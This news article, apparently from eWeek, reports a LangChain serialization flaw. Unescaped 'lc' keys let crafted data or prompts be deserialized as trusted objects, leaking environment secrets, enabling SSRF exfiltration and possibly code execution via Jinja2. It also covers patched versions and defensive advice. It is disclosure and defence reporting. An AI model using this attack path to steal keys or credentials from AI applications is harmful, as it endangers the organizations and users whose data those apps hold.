|
Navigation
Recherche
|
LangChain AI Vulnerability Exposes Millions of Apps
lundi 29 décembre 2025, 16:11 , par eWeek
LangChain AI Vulnerability Exposes Millions of Apps
Millions of AI apps trust LangChain to handle sensitive data. That trust just took a serious hit. A critical security flaw has struck LangChain, one of the most widely used AI frameworks in the world, exposing millions of applications to potential secret theft and malicious code injection. Security researchers say the vulnerability allows attackers to exploit LangChain’s core serialization logic to extract environment variables and execute unauthorized actions, putting API keys, credentials, and sensitive data at risk across the AI ecosystem. How attackers are exploiting this ‘Christmas gift’ vulnerability The attack vector centers on LangChain’s serialization functions that failed to properly handle user-controlled data. Industry analysis published today reveals that the dumps() and dumpd() functions don’t escape dictionaries containing ‘lc’ keys — internal markers that LangChain uses to identify its own serialized objects. When malicious actors inject data with these special keys, the system treats it as legitimate LangChain content during deserialization rather than untrusted user input. A Cyata security expert discovered this flaw during AI trust boundary audits, spotting the missing escape mechanism in serialization code. The vulnerability enables multiple devastating attack paths: secret extraction from environment variables when deserialization runs with ‘secrets_from_env=True’ instantiation of classes within trusted namespaces like langchain_core and langchain_community potential arbitrary code execution through Jinja2 templates Think API keys, database passwords, authentication tokens — everything attackers need to break into corporate systems. Threat actors can craft prompts to instantiate allowlisted classes, triggering SSRF attacks with environment variables embedded in headers for data exfiltration. Since this affects common flows like event streaming, logging, and caching, virtually any LangChain application processing untrusted data could be compromised. The race against time: patches and protection strategies LangChain responded swiftly to the disclosure, releasing patches that fundamentally change how the framework handles serialization security. The fixes published today include new allowlist parameters in load() and loads() functions to specify which classes can be serialized and deserialized. Jinja2 templates are now blocked by default, and the dangerous ‘secrets_from_env’ option has been switched to ‘False’ to prevent automatic secret loading from environment variables. Vulnerable versions include langchain-core >= 1.0.0, < 1.2.5 and < 0.3.81, with fixes available in versions 1.2.5 and 0.3.81 respectively. Originally reported via Huntr on Dec. 4, LangChain acknowledged the vulnerability the next day and published the advisory on December 24. Adding to the chaos, a parallel vulnerability also hit LangChainJS, tracked as CVE-2025-68665, demonstrating that this serialization injection problem affects the entire LangChain ecosystem. What this means for your AI applications right now Cybersecurity experts today are issuing urgent warnings: upgrade langchain-core immediately and verify dependencies like langchain-community are also updated. Organizations must treat LLM outputs as untrusted data, audit deserialization processes in streaming and logging systems, and disable secret resolution unless inputs are thoroughly verified. The timing amplifies the urgency as organizations must inventory their agent deployments for swift triage amid booming LLM application adoption. This vulnerability underscores the critical need for treating AI model outputs with the same security scrutiny as any external data source, fundamentally changing how developers must approach AI application security. Given LangChain’s massive footprint across the AI ecosystem, industry insiders are calling this more than just another security patch – it’s a wake-up call for the entire industry to rethink trust boundaries in AI applications before attackers turn the holiday season into a data theft bonanza. Related: OpenAI is also tightening its defenses. Here’s how the company is using its new Atlas system to detect and disrupt ChatGPT abuse at scale. The post LangChain AI Vulnerability Exposes Millions of Apps appeared first on eWEEK.
https://www.eweek.com/news/langchain-ai-vulnerability-exposes-apps-to-hack/
Voir aussi |
56 sources (32 en français)
Date Actuelle
lun. 29 déc. - 18:27 CET
|








